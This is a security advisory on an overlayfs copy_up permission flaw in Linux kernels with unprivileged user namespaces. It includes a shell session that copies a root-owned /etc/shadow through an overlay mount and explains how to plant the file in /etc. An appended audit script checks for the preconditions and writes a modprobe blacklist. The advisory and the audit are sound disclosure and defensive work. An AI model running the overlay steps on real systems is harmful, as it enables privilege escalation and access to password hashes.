The overlayfs filesystem does not correctly check file permissions when
creating new files in the upper filesystem directory. This can be exploited
by an unprivileged process in kernels with CONFIG_USER_NS=y and where
overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs
inside unprivileged mount namespaces.

If you don't want to update your kernel and you don't use overlayfs, a viable
workaround is to just remove or blacklist overlayfs.ko / overlay.ko.

Details
=======

From Documentation/filesystems/overlayfs.txt :

"Objects that are not directories (files, symlinks, device-special
files etc.) are presented either from the upper or lower filesystem as
appropriate. When a file in the lower filesystem is accessed in a way
that requires write-access, such as opening for write access, changing
some metadata etc., the file is first copied from the lower filesystem
to the upper filesystem (copy_up)."

The ovl_copy_up_* functions do not correctly check that the user has
permission to write files to the upperdir directory. The only permission
that is checked is whether the owner of the file that is being modified has
permission to write to the upperdir. Furthermore, when a file is copied from
the lowerdir the file metadata is carbon copied, instead of attributes such as
owner being changed to the user that triggered the copy_up_* procedures.

Example of creating a 1:1 copy of a root-owned file:

(Note that the workdir= option is not needed on older kernels)

server-1504:~$ ./create-namespace
:~# mount -t overlay -o lowerdir=/etc,upperdir=upper,workdir=work overlayfs o
:~# chmod 777 work/work/
:~# cd o
:~/o# mv shadow copy_of_shadow
(exit the namespace)
:~$ ls -al upper/copy_of_shadow
-rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow
:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode
Device: 801h/2049d Inode: 939791 Links: 1
Device: 801h/2049d Inode: 277668 Links: 1

Now we can place this file in /etc by switching "upper" to be the lowerdir
option; the permission checks pass since the file is owned by root and root
can write to /etc.
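An added audit script, not from the advisory or from any project it names, that checks a host for the preconditions the advisory calls out (CONFIG_USER_NS=y and an overlay module loaded or registered) and writes the modprobe blacklist it recommends as a workaround. The functions take file paths so they can run over constructed input; the /boot/config-$(uname -r) and /proc paths used in audit() are assumed defaults, and the kernel.unprivileged_userns_clone sysctl is assumed to exist only on Ubuntu/Debian-derived kernels.

```shell
#!/bin/sh
# Added example: audit helpers for the overlayfs copy_up permission flaw.

# 0 if the kernel config file at $1 has CONFIG_USER_NS=y (unprivileged user
# namespaces compiled in), 1 otherwise.
userns_enabled() {
    grep -qx 'CONFIG_USER_NS=y' "$1"
}

# 0 if a /proc/modules-style listing at $1 shows overlay or overlayfs loaded.
overlay_loaded() {
    awk '$1 == "overlay" || $1 == "overlayfs" { found = 1 } END { exit !found }' "$1"
}

# 0 if a /proc/filesystems-style listing at $1 registers overlay/overlayfs
# (built in or already loaded); lines look like "nodev<TAB>overlay".
overlay_registered() {
    awk '$NF == "overlay" || $NF == "overlayfs" { found = 1 } END { exit !found }' "$1"
}

# Write the modprobe.d workaround to $1. "blacklist" stops autoloading by
# alias; "install ... /bin/false" also refuses explicit modprobe requests.
write_blacklist() {
    cat > "$1" <<'EOF'
# Workaround for the overlayfs copy_up permission flaw: refuse to load the module.
blacklist overlay
blacklist overlayfs
install overlay /bin/false
install overlayfs /bin/false
EOF
}

# Live audit using assumed default locations; adjust per distribution.
audit() {
    cfg="/boot/config-$(uname -r)"
    [ -r "$cfg" ] && userns_enabled "$cfg" && echo "CONFIG_USER_NS=y: unprivileged namespaces possible"
    overlay_loaded /proc/modules && echo "overlay module is loaded"
    overlay_registered /proc/filesystems && echo "overlay filesystem is registered"
    # Ubuntu/Debian kernels expose an extra switch; 0 disables unprivileged clone.
    [ -r /proc/sys/kernel/unprivileged_userns_clone ] && \
        echo "kernel.unprivileged_userns_clone=$(cat /proc/sys/kernel/unprivileged_userns_clone)"
    return 0
}
```

Run `audit` on a live host, or call the individual checks on saved copies of the config and /proc listings collected from fleet machines.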